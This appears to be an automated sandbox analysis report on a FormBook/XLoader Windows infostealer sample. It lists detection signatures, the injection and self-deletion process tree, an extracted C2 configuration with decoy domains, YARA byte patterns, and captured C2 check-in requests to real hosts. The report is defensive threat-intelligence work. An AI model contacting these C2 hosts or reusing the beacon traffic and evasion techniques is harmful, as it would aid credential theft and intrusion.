Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DN_467842234567.exe

Overview

General Information

Sample Name:DN_467842234567.exe
Analysis ID:491743
MD5:c16013ea29f9dd1525dcb65c2184784e
SHA1:5afd533f29573050734e428f9f8c9ba08c79546a
SHA256:df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DN_467842234567.exe (PID: 1088 cmdline: 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: C16013EA29F9DD1525DCB65C2184784E)
    • DN_467842234567.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: C16013EA29F9DD1525DCB65C2184784E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 4388 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 5492 cmdline: /c del 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.DN_467842234567.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.DN_467842234567.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.DN_467842234567.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        0.2.DN_467842234567.exe.e920000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.DN_467842234567.exe.e920000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: DN_467842234567.exeReversingLabs: Detection: 64%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllReversingLabs: Detection: 11%
          Machine Learning detection for sampleShow sources
          Source: DN_467842234567.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllJoe Sandbox ML: detected
          Source: 1.1.DN_467842234567.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.DN_467842234567.exe.e920000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.WWAHost.exe.3d57968.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.DN_467842234567.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.WWAHost.exe.a398b0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: DN_467842234567.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kxdrstone.com
          Source: C:\Windows\explorer.exeDomain query: www.financecreditpro.com
          Source: C:\Windows\explorer.exeDomain query: www.2377k.com
          Source: C:\Windows\explorer.exeDomain query: www.portale-accessi-anomali.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.9.90.226 80
          Source: C:\Windows\explorer.exeDomain query: www.nurhalilah.xyz
          Source: C:\Windows\explorer.exeDomain query: www.uscryptomininglaws.com
          Source: C:\Windows\explorer.exeDomain query: www.healthcaresms.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.11.163 80
          Source: C:\Windows\explorer.exeDomain query: www.drive16pay.art
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeDomain query: www.lottochain.bet
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.98 80
          Source: C:\Windows\explorer.exeDomain query: www.smpldebts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.165.66.108 80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.nurhalilah.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bofight.store/r95e/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 19:07:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6957037758895c14-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color:
          Source: DN_467842234567.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: DN_467842234567.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.kxdrstone.com
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
